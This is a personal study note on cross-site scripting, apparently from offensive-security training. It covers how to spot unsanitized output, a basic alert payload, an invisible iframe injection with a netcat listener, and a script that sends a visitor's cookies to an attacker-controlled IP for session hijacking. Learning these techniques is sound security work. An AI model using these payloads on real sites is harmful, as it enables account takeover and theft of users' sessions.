Till Studer's Notes

Recent Notes

Eating Your Own Dog Food
Dec 27, 2024
The Map Is Not the Territory
Dec 27, 2024
The Zen of Security Rules
Aug 22, 2024
Public Attack Simulation Repos
Aug 03, 2024
Public Detection Rule Repos
Aug 03, 2024

❯

01_Zettelkasten

❯

Cross-Site Scripting

Aug 29, 20231 min read

Cross-Site Scripting

If the data displayed on the website is not sanitized (server-side) we can abuse it to execute code under the context of the user viewing the page with their browser
- Sometimes output can appear not to be sanitized, but it’s just encoded
- To verify, use the browser’s debugger/inspector

Identifying XSS Vulnerabilities

Search for input fields which display unsanitized output
- Test with these characters: < > ' " { } ;

Basic XSS

<script>alert('XSS')</script>

Content Injection

<iframe src=http://10.11.0.4/report height=”0” width=”0”></iframe>
- IFrames are used to embed another file, in our case the report page hosted by us
- The IFrame is invisible since it doesn’t have any height or width
To test if it works:
- sudo nc -nvlp 80
- Try normal user behavior and see if we see the request in netcat

Stealing Cookies and Session Information

If we can steal a authenticated user’s cookie we can use it to impersonate them.
<script>new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;</script>
Once the cookie has been retrieved, use the Cookie-Editor addon in Firefox to add/manipulate your own cookies

Relevant Note(s):

Graph View

Cross-Site Scripting
Identifying XSS Vulnerabilities
Basic XSS
Content Injection
Stealing Cookies and Session Information

Backlinks

Web Application Attacks

Created with Quartz v4.4.0 © 2025

GitHub
LinkedIn
Email